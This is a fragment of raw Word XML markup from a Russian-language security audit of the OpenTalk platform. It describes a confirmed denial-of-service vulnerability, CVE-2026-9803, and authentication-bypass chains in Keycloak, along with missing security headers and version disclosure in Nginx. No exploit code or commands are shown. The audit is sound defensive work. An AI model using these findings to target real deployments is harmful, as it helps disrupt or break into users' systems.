              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09420FE0" w14:textId="51316781" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00763E44" w:rsidP="00004B23">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B63AEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>единственный</w:t>
            </w:r>
            <w:r w:rsidR="00B63AEE" w:rsidRPr="00B63AEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> компонент аутентификации, его недоступность блокирует вход пользователей в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>OpenTalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B63AEE" w:rsidRPr="00B63AEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> целиком, даже при исправной работе остальных микросервисов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2814DF9C" w14:textId="77777777" w:rsidR="00087F8B" w:rsidRPr="00087F8B" w:rsidRDefault="00087F8B" w:rsidP="00087F8B">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52466D25" w14:textId="4E481333" w:rsidR="006A73C5" w:rsidRDefault="00B63AEE" w:rsidP="006974E9">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Уязвимость CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2026-9803</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> подтверждена</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>в отличие от цепочки 1, не требует выполнения дополнительных условий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплуатация возможна на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">любой </w:t>
      </w:r>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">конфигурации, что делает её реальным вектором отказа в обслуживании для ПО </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63AEE">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153B1858" w14:textId="77777777" w:rsidR="00B63AEE" w:rsidRPr="00087F8B" w:rsidRDefault="00B63AEE" w:rsidP="006974E9">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4330FD39" w14:textId="7DBE575A" w:rsidR="00557FDB" w:rsidRDefault="00557FDB" w:rsidP="00557FDB">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01725C7C" wp14:editId="10CCB983">
            <wp:extent cx="5853205" cy="2019534"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6087866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578" cy="20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0417" w14:textId="0041A5BE" w:rsidR="007E74C8" w:rsidRDefault="00557FDB" w:rsidP="00557FDB">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Некорректная обработка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1E2C7" w14:textId="3FB96A34" w:rsidR="001E0634" w:rsidRDefault="001E0634" w:rsidP="002C4CF3">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FAE8870" wp14:editId="2E6CBC91">
            <wp:extent cx="2535407" cy="3437840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16906037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418" cy="346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41DA" w14:textId="77E40C63" w:rsidR="002C4CF3" w:rsidRPr="002C4CF3" w:rsidRDefault="002C4CF3" w:rsidP="002C4CF3">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Ref234286605"/>
      <w:r>
        <w:t>Обратный ответ от сервера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6A01FCBD" w14:textId="77777777" w:rsidR="00B63AEE" w:rsidRDefault="00B63AEE" w:rsidP="00B63AEE">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF81EBA" w14:textId="77777777" w:rsidR="00B63AEE" w:rsidRDefault="00B63AEE" w:rsidP="00B63AEE">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1745F7EF" w14:textId="00DF5BED" w:rsidR="00B63AEE" w:rsidRPr="00D80616" w:rsidRDefault="00A00BC9" w:rsidP="00F72134">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00BC9">
        <w:t xml:space="preserve">Анализ двух построенных цепочек показал, что наиболее часто встречающимся классом ошибок в исследуемой системе является обход аутентификации и связанные с ним нарушения в обработке «OIDC-токенов», обе цепочки сосредоточены исключительно в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A00BC9">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A00BC9">
        <w:t>, как единственном внешне</w:t>
      </w:r>
      <w:r w:rsidR="004F5E0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00BC9">
        <w:t>достижимом</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00BC9">
        <w:t>компоненте платформы.</w:t>
      </w:r>
      <w:r w:rsidR="00B63AEE">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854EBD1" w14:textId="77777777" w:rsidR="007C5AB5" w:rsidRDefault="007C5AB5" w:rsidP="007C5AB5">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7007">
        <w:t>Аудит безопасности ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B479E" w14:textId="7CBDB2B9" w:rsidR="001B7E9E" w:rsidRPr="001B7E9E" w:rsidRDefault="001B7E9E" w:rsidP="001B7E9E">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">В рамках аудита безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> был проведён анализ основных компонентов платформы: </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, подсистемы аутентификации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EF198B" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF198B">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>REST API</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> контроллера, веб-интерфейса, подсистемы хранения данных (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Rabbit</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>MQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">) и медиасервера </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Проверки выполнялись с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>uclei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> REST API</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и анализа журналов сервиса на стенде </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>opentalk.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D73E62" w14:textId="62DA456F" w:rsidR="002B7007" w:rsidRPr="001B7E9E" w:rsidRDefault="001B7E9E" w:rsidP="002B7007">
      <w:pPr>
        <w:pStyle w:val="130"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Прокси-сервер </w:t>
      </w:r>
      <w:r w:rsidR="002B7007" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B7007" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B96FEF" w14:textId="11D9B2E1" w:rsidR="00132FA3" w:rsidRPr="00132FA3" w:rsidRDefault="001B7E9E" w:rsidP="002B7007">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>Сканирование</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uclei</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234287369 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>листинг</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.1</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>показало</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>отсутствие</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>защитных</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>заголовков</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content-security-policy</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x-frame-options</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strict-transport-security</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>Заголовок</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>раскрывает</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>версию</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
